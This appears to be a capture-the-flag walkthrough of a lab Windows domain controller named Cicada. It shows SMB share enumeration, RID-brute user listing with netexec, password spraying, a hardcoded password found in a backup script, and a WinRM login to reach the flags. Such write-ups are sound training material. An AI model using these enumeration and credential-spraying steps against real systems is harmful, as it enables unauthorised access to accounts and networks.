Scan
Scan
############################################################
Enumeration of shares
smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our
security protocols, it's essential that you change your default password to
something unique and secure.
1. Log in to your Cicada Corp account** using the provided username and the default
password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change
Password".
4. Follow the prompts to create a new password**. Make sure your new password is
strong, containing a mix of uppercase letters, lowercase letters, numbers, and
special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please
do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't
hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada
Corp team!
Best regards,
Cicada Corp
###################################################################################
###################################################################################
###################################
Scan users domain:
┌──(kali㉿kali)-[~/cicada.htb]
Filter for users only
netexec smb 10.10.11.35 -u guest -p '' --rid-brute | grep SidTypeUser > users.txt
┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat users.txt
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\
Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\
CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\
john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\
sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\
michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\
david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\
emily.oscars (SidTypeUser)
┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat users.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' >
cicada.htb-users.txt
┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat cicada.htb-users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
###################################################################################
###################################################################################
########
Spray password against saves users list, and found 1 valid user
I installed the enum4linux-ng, I had only the enum4linux and realize was wrong at
this point. After the new tool installed I found new user and password.
...
...
###################################################################################
##############################
I tried with this credentials to browse the other share DEV on 10.10.11.35 and
found a ps1 script
cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username,
$password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
###################################################################################
#################################
Since we have TCP port 5985 open we can try to connect and grab user.txt Flag
Directory: C:\Users\emily.oscars.CICADA\Desktop
PRIVILEGES INFORMATION
----------------------
Files : root.txt
------------------------------------------------------------------------------
1 C:\Users\Administrator\Desktop\
------------------------------------------------------------------------------